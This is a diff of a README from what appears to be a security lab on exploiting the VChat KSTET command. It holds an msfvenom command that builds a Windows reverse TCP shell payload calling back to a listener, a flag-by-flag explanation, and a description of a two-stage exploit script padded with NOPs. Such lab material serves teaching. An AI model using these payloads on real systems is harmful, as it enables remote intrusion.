xinwenfu/VChat_KSTET_Multi/README.md

 		<img src="Images/I35.png" width=800>

-2. Generate the second stage reverse shell code using ```msfvenom``` program, and create an exploit script as shown in [exploit6.py](./SourceCode/exploit6.py)
+2. Generate the second stage reverse shell code using ```msfvenom``` program, and create an exploit script as shown in [exploit6.py](./SourceCode/exploit6.py).

 	```
 	$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=8080 EXITFUNC=thread -f python -v SHELL -b '\x00x\0a\x0d'
 	```
 	* `-p `: Payload we are generating shellcode for.
-    	* `windows/shell_reverse_tcp`: Reverse TCP payload for Windows
+    	* `windows/shell_reverse_tcp`: Reverse TCP payload for Windows.
-    	* `LHOST=10.0.2.7`: The remote listening host's IP, in this case our Kali machine's IP 10.0.2.7
+    	* `LHOST=10.0.2.7`: The remote listening host's IP, in this case our Kali machine's IP 10.0.2.7.
-    	* `LPORT=8080`: The port on the remote listening host's traffic should be directed to in this case port 8080
+    	* `LPORT=8080`: The port on the remote listening host's traffic should be directed to in this case port 8080.
-    	* `EXITFUNC=thread`: Create a thread to run the payload
+    	* `EXITFUNC=thread`: Create a thread to run the payload.
-  	* `-f`: The output format
+  	* `-f`: The output format.
     	* `python`: Format for use in python scripts.
-  	* `-v`: Specify a custom variable name
+  	* `-v`: Specify a custom variable name.
-    	* `SHELL`: Shell Variable name
+    	* `SHELL`: Shell Variable name.
   	* `-b`: Specifies bad chars and byte values.
-This is given in the byte values
+This is given in the byte values.
       	* `\x00x\0a\x0d`: Null char, carriage return, and newline.
 3. The [exploit6.py](./SourceCode/exploit6.py) script first sends the Stage-1 exploit as is done in the [exploit5.py](./SourceCode/exploit5.py) script, then it waits a few seconds and sends the second stage of the exploit which will attempt to reach out to our *Kali Linux* machine on port 8080.
 To add some resiliency to inaccurate jumps, we pad the buffer the `recv(...)` call writes to, which is 1024 bytes with `\x90` the NOP instruction, by adding them to the start of the second stage.

 	<img src="Images/I36.png" width=800>